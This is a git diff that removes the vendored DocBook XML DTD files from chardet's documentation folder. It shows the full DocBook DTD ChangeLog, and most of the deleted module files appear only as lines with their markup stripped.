- - diff --git a/chardet/docs/docbook/dtd/ChangeLog b/chardet/docs/docbook/dtd/ChangeLog deleted file mode 100644 index 08a83b2..0000000 --- a/chardet/docs/docbook/dtd/ChangeLog +++ /dev/null @@ -1,378 +0,0 @@ -2004-03-31 Norman Walsh - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, htmltblx.mod: - Updated version number - - * docbookx.dtd: DocBook XML V4.3 released - -2004-03-22 Norman Walsh - - * freshmeat.xsl: Update release reason and changes message - -2004-03-18 Norman Walsh - - * dbnotnx.mod: Fixed comment - -2004-01-21 Norman Walsh - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.dtd, htmltblx.mod: - Changed version number to V4.3CR2 - - * dbpoolx.mod, htmltblx.mod: Make sure floatstyle is on table and informaltable - -2003-12-21 Norman Walsh - - * Makefile, freshmeat.xsl: Support freshmeat target - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, htmltblx.mod: - Updated version numbers - - * dbpoolx.mod: Refactor parameter entities for informaltable so that textobject is handled correctly; avoid duplicate ID on caption when HTML tables are allowed. - - * docbookx.dtd: DocBook V4.3CR2 released - -2003-12-20 Norman Walsh - - * dbpoolx.mod: Put HTML attributes on caption of HTML tables are allowed - -2003-12-19 Norman Walsh - - * Makefile: Add doc target - - * htmltblx.mod: Make sure textobject goes in the DocBook branch of informaltable - -2003-12-02 Norman Walsh - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, htmltblx.mod: - Updated version number - - * docbookx.dtd: Released 4.3CR1 - -2003-10-28 Norman Walsh - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.dtd, htmltblx.mod: - Released 4.3b5 - - * dbnotnx.mod: Added SWF notation - - * dbpoolx.mod: Make firstterm isomorphic to glossterm - -2003-09-28 Norman Walsh - - * dbpoolx.mod: RFE #573812: allow blockinfo on blockquote - - * dbpoolx.mod: RFE #564776: added process, service, server, and daemon to the class values of systemitem - - * dbpoolx.mod: RFE #571998: added initializer to paramdef - - * dbpoolx.mod: RFE #518074: added a number of new values to the class attribute of database - - * dbpoolx.mod: RFE #533734: allow void to be optional on {method|constructor|destructor}synopsis - - * dbpoolx.mod: Added StepAlternatives - - * dbpoolx.mod: RFE #507975: revision should allow author or authorinitials - - * dbpoolx.mod: RFE #517604: allow optional title on glosslist - - * dbpoolx.mod: RFE #570068: added emailmessage, webpage, and newsposting as pubwork values for citetitle - - * dbpoolx.mod: RFE #571996: added prefix, namespace, and localname to class for sgmltag - -2003-09-25 Norman Walsh - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.dtd, htmltblx.mod: - Changed V4.2b2 to V4.2b3 - - * dbhierx.mod: Allow Set to be recursive - - * dbhierx.mod, dbpoolx.mod: Added type attribute to indexterm and index - - * dbpoolx.mod: Added xml:base - - * dbpoolx.mod: Added code - - * dbpoolx.mod: RFE #615473: added floatstyle to (informal)figure, (informal)example, and (informal)equation - - * htmltblx.mod: Fixup some PEs so that we don't get duplicated attribute declarations - - * htmltblx.mod: Put blockinfo and textobject back into the CALS table model - -2003-08-15 Norman Walsh - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.dtd, htmltblx.mod: - Changed 4.2 to 4.3b2 - - * calstblx.dtd, dbpoolx.mod, htmltblx.mod, soextblx.dtd: - Allow HTML table models in addition to CALS or SOEx table models (2003 Apr) - - * dbpoolx.mod: Task markup (2003 Jun) - -2003-08-11 Norman Walsh - - * dbhierx.mod: Related to RFE 514435: allow multiple refnamediv elements in refentry (2003 Jul) - - * dbnotnx.mod: RFE 698844: add PDF notation (2003 May) - - * dbpoolx.mod: RFE 660044: support continuation and startinglinenumber on verbatims (2003 Feb) - - * dbpoolx.mod: Related to RFE 679316: add orgname to inlines (2003 Jul) - - * dbpoolx.mod: RFE 655526: support modifier in funcprototype (2003 Feb) - - * dbpoolx.mod: RFE 573419: add bidirectional text override (2003 Apr) - - * dbpoolx.mod: Added function attribute to keycap for improved semantics (2003 Jul) - - * dbpoolx.mod: RFE 691762: add language attribute to verbatim environments (2003 May) - - * dbpoolx.mod: RFE 705885: add namespace attribute to sgmltag (2003 May) - - * dbpoolx.mod: RFE 565716: support for URI element (2003 Apr) - -2003-08-09 Norman Walsh - - * dbpoolx.mod: RFE 582822: paramdef and varargs on funcprototype (2003 Feb) - - * dbpoolx.mod: RFE 638456: support translators (2003 Feb) - - * dbpoolx.mod: Added xrefstyle (2002 Dec) - - * dbpoolx.mod: RFE 473365: choice attribute for paramdef (2003 Feb) - - * dbpoolx.mod: RFE 570068: new values for pubwork (2003 Jan) - - * docbookx.dtd: Fix SDATA entity for euro - -2002-07-17 Norman Walsh - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.dtd: - DocBook XML V4.2 released - -2002-05-28 Norman Walsh - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.dtd: - Updated comments to reflect CR3 - -2002-05-21 Norman Walsh - - * dbnotnx.mod: SVG notation accidentally left out of notation.class - - * docbookx.dtd: Fix syntactic error intentionally introduced behind mutually exclusive PEs. Now make the DTD useless, but not syntactically invalid - -2002-05-12 Norman Walsh - - * dbpoolx.mod: Add accidentally missing local.info.class to info.class - -2002-03-19 Norman Walsh - - * calstblx.dtd, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod: - Prepare for CR1 - - * catalog.xml, docbook.cat: Prepare for CR1 and fix search-and-replace typos - - * dbpoolx.mod: Make type other tokens in bibliorelation unique for SGML compatibility - - * dbpoolx.mod: Make spatial/temporal other tokens unique for SGML compatibility - - * dbpoolx.mod: Added bibliosource, bibliorelation, and bibliocoverage - - * dbpoolx.mod: Move bibliorelation type attribute into a PE so that it can be expanded the way we want - - * dbpoolx.mod: Implemented RFE #480957 - - * dbpoolx.mod: Revise graphic attributes: add contentwidth, contentdepth, and valign - - * dbpoolx.mod: Add class attribute to orgname - - * dbpoolx.mod: Implemented RFE #480954: add textdata element - - * dbpoolx.mod: Added blockinfo element - - * dbpoolx.mod: RFE #513426: Text alternative for tables - - * dbpoolx.mod: Add consortium to the list of classes on orgname - - * docbookx.dtd: DocBook V4.2 Candidate Release 1 released - -2002-02-05 Norman Walsh - - * dbhierx.mod: Implemented RFE #501363 - - * dbpoolx.mod: Implemented RFE #492099 - - * dbpoolx.mod: Implemented RFE #498848 - - * dbpoolx.mod: Implemented RFE #480955 - -2002-01-06 Norman Walsh - - * dbcentx.mod: Added marked sections around character set entity references - -2001-11-20 Norman Walsh - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.dtd: - DocBook V4.2b1 released - - * dbpoolx.mod: Implemented RFE #482821 - -2001-11-19 Norman Walsh - - * dbhierx.mod, dbpoolx.mod: Implemented RFE #456460 - -2001-11-18 Norman Walsh - - * dbpoolx.mod: RFE #482817: Add errortext element - -2001-11-17 Norman Walsh - - * dbpoolx.mod: RFE 482821: Add extension to the list of class values on filename - - * dbpoolx.mod: RFE 482053: Add support for DOI in meta - - * dbpoolx.mod: Removed bogus occurrence indicator in info.class; fixed typo in qandaset PEs - -2001-11-13 Norman Walsh - - * 40chg.txt, 41chg.txt, LostLog: Removed old files - - * Makefile: Fixed typo - - * Makefile: Makefile - - * README: Removed version information - - * README, readme.txt: Renamed - - * calstblx.dtd, catalog.xml, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.dtd: - Removed 'XML' from public identifiers for files that will now be common to both XML and SGML - - * catalog.xml: Fixed missing end tag - -2001-11-12 Norman Walsh - - * calstblx.dtd, dbcentx.mod, dbgenent.mod, dbnotnx.mod, readme.txt: - Updated version numbers - - * catalog.xml, docbook.cat: Added XML Catalog; updated public identifiers in catalog - - * dbpoolx.mod: Implemented RFE #480956 - - * dbpoolx.mod: Former RFE 133: Added newsgroup class to systemitem - -2001-11-09 Norman Walsh - - * dbhierx.mod: Implemented RFE #426382 - - * dbhierx.mod: Implemented RFE #417671 - - * dbhierx.mod, dbpoolx.mod: Implemented RFE #436072 - - * dbhierx.mod, dbpoolx.mod, docbookx.dtd: Changed version number - - * dbnotnx.mod: Implemented RFE #440597 - - * dbpoolx.mod: Implemented RFE #435485 - - * dbpoolx.mod: Expand the content model of the following elements from smallcptr.char.mix back to cptr.char.mix: interfacename, action, database, filename, hardware, keycap, option, parameter, property, and systemitem (command, interface, and literal were never reduced). - - * dbpoolx.mod: Implemented RFE #431418 - - * dbpoolx.mod: Implemented RFE #431419 - - * dbpoolx.mod: Implemented RFE #435466 - - * dbpoolx.mod: Implemented RFE #439136 - - * dbpoolx.mod: Implemented RFE #431415 - - * dbpoolx.mod: Implemented RFE #431413 - - * dbpoolx.mod: Implemented RFE #434439 - -2001-11-07 Norman Walsh - - * calstblx.dtd, dbcentx.mod, dbhierx.mod, dbpoolx.mod, docbookx.dtd: - Towards a 4.2 release: reparameterize so that the SGML DTD is just a customization of the XML DTD - - * calstblx.dtd, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbookx.dtd: - Whitespace fixes - -2001-08-07 Norman Walsh - - * dbhierx.mod: RFE 426382: Norm to allow SimpleSect inside Section - - * dbpoolx.mod: RFE 431419: Norm to add markup for FS type and partition - - * dbpoolx.mod: RFE 431418: Norm to add typing to funcdef and paramdef - - * dbpoolx.mod: Fix comments; implement proposal of the TC to expand the content model of selected inlines - - * dbpoolx.mod: RFE 434439: Add language attribute to fieldsynopsis et al. - - * dbpoolx.mod: RFE 431415: Norm to add markup for host identifiers - -2001-06-18 Norman Walsh - - * 40chg.txt, 41chg.txt, LostLog, Makefile, calstblx.dtd, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.cat, docbookx.dtd, readme.txt: - Additional work on DocBook XML V5.0; I had the wrong CVS repository for a while so there's a bunch of changes lumped together here - - * Makefile: branches: 1.1.2; - file Makefile was initially added on branch V50-devel. - -2001-03-12 - - * calstblx.dtd, dbcentx.mod, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbookx.dtd, readme.txt: - Updated version numbers - - * dbcentx.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbookx.dtd, soextblx.dtd: - New file. - - * docbook.cat: New file. - - * docbookx.cat: branches: 1.1.2; - file docbookx.cat was initially added on branch V50-devel. - - * docbookx.cat: New file. - -2001-01-14 - - * dbpoolx.mod: branches: 1.5.2; - RFE #140: Allow multiple MsgExplan inside SimpleMsgEntry - -2000-11-12 - - * dbhierx.mod: branches: 1.6.2; - Add refentry; accidentally left out - - * dbhierx.mod: Allow beginpage to be the first child of toc, lot, appendix, chapter, - part, preface, reference, and refentry. (It can't be at the start of - bibliography, glossary, index, or setindex because of ambiguity - problems.) - -2000-09-19 - - * 40chg.txt, calstblx.dtd, dbcentx.mod, dbgenent.ent, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbookx.dtd, readme.txt, soextblx.dtd: - DocBook XML V4.0 - - * 40chg.txt, soextblx.dtd: branches: 1.2.2; - DocBook XML V4.1 - - * 41chg.txt, LostLog, calstblx.dtd, dbcentx.mod, dbgenent.ent, dbgenent.mod, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.dtd, readme.txt: - DocBook XML V4.1.1 - - * 41chg.txt, LostLog, calstblx.dtd, dbcentx.mod, dbgenent.ent, dbhierx.mod, dbnotnx.mod, dbpoolx.mod, docbook.cat, docbookx.dtd, readme.txt: - DocBook XML V4.1 - - * 41chg.txt, LostLog, docbook.cat: branches: 1.3.2; - DocBook XML V4.1.2 - - * calstblx.dtd, dbcentx.mod, dbnotnx.mod, docbookx.dtd, readme.txt: - branches: 1.4.2; - DocBook XML V4.1.2 - - * dbgenent.mod: branches: 1.2.2; - DocBook XML V4.1.2 - - * dbhierx.mod, dbpoolx.mod: DocBook XML V4.1.2 - diff --git a/chardet/docs/docbook/dtd/README b/chardet/docs/docbook/dtd/README deleted file mode 100644 index 6fc60c4..0000000 --- a/chardet/docs/docbook/dtd/README +++ /dev/null @@ -1,8 +0,0 @@ -README for the DocBook XML DTD - -For more information about DocBook, please see - - http://www.oasis-open.org/docbook/ - -Please send all questions, comments, concerns, and bug reports to the -DocBook mailing list: docbook@lists.oasis-open.org diff --git a/chardet/docs/docbook/dtd/calstblx.dtd b/chardet/docs/docbook/dtd/calstblx.dtd deleted file mode 100644 index d435cf4..0000000 --- a/chardet/docs/docbook/dtd/calstblx.dtd +++ /dev/null @@ -1,205 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/catalog.xml b/chardet/docs/docbook/dtd/catalog.xml deleted file mode 100644 index 34d1afd..0000000 --- a/chardet/docs/docbook/dtd/catalog.xml +++ /dev/null @@ -1,115 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/dbcentx.mod b/chardet/docs/docbook/dtd/dbcentx.mod deleted file mode 100644 index cdb73c5..0000000 --- a/chardet/docs/docbook/dtd/dbcentx.mod +++ /dev/null @@ -1,384 +0,0 @@ - - - - - - - - - - - - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - -]]> - -]]> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/dbgenent.mod b/chardet/docs/docbook/dtd/dbgenent.mod deleted file mode 100644 index 3033344..0000000 --- a/chardet/docs/docbook/dtd/dbgenent.mod +++ /dev/null @@ -1,41 +0,0 @@ - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/dbhierx.mod b/chardet/docs/docbook/dtd/dbhierx.mod deleted file mode 100644 index b1d9c01..0000000 --- a/chardet/docs/docbook/dtd/dbhierx.mod +++ /dev/null @@ -1,2116 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -%rdbhier; -]]> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -%rdbhier2; -]]> - - - - - - - - - - - - - - - - - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> -]]> - - - - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - -]]> -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> - -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - -]]> - - - -]]> - - - - - - -]]> - - - -]]> - - - - - - -]]> - - - -]]> - - - - - - -]]> - - - -]]> - - - - - - -]]> - - - -]]> - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - - - -]]> - - - -]]> - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - -]]> - - - -]]> - - - - - -]]> - - - -]]> - - - - - -]]> - -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> -]]> - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - - - - -]]> - - - - - - - -]]> -]]> - - - diff --git a/chardet/docs/docbook/dtd/dbnotnx.mod b/chardet/docs/docbook/dtd/dbnotnx.mod deleted file mode 100644 index be8f674..0000000 --- a/chardet/docs/docbook/dtd/dbnotnx.mod +++ /dev/null @@ -1,101 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/chardet/docs/docbook/dtd/dbpoolx.mod b/chardet/docs/docbook/dtd/dbpoolx.mod deleted file mode 100644 index 3305901..0000000 --- a/chardet/docs/docbook/dtd/dbpoolx.mod +++ /dev/null @@ -1,8250 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -%rdbpool; -]]> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -]]> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - - - - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - -]]> - - - - -]]> - - - -]]> - - - - -]]> - - - -]]> - - - -]]> - - - -]]> - - - - -]]> - - - -]]> - -]]> - - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> -]]> - - - - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - - -]]> - - - - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> -]]> - - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - -]]> - - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - - -]]> -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - -]]> - - - - - - - -]]> - - - -]]> - - -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - - -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - - - - - -]]> - - - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - - - - - - - -%htmltbl; -]]> - - - - - - - - - - - - - - - - - - - -]]> - - - - - - - - - - - - - - - - - - - - - - - - -]]> - -%tablemodel; - -]]> - - - - - - - - - - - -]]> - - - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> - - - - -]]> -]]> - - - - - - - - - - - - -]]> - - - -]]> - - -]]> - - - - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - -]]> - - - - - - - -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> -]]> -]]> - - - - - - - - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - - - -]]> - - - -]]> - ]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - - - -]]> - - - -]]> - ]]> - - -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> - -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - ]]> - - - - -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - - - -]]> - - - -]]> - ]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - -]]> - - - -]]> - ]]> - - - - - - - -]]> - - - -]]> - ]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> -]]> - - - - - - - - -]]> - - - - -]]> -]]> - - - - - - - - - -]]> - - - -]]> 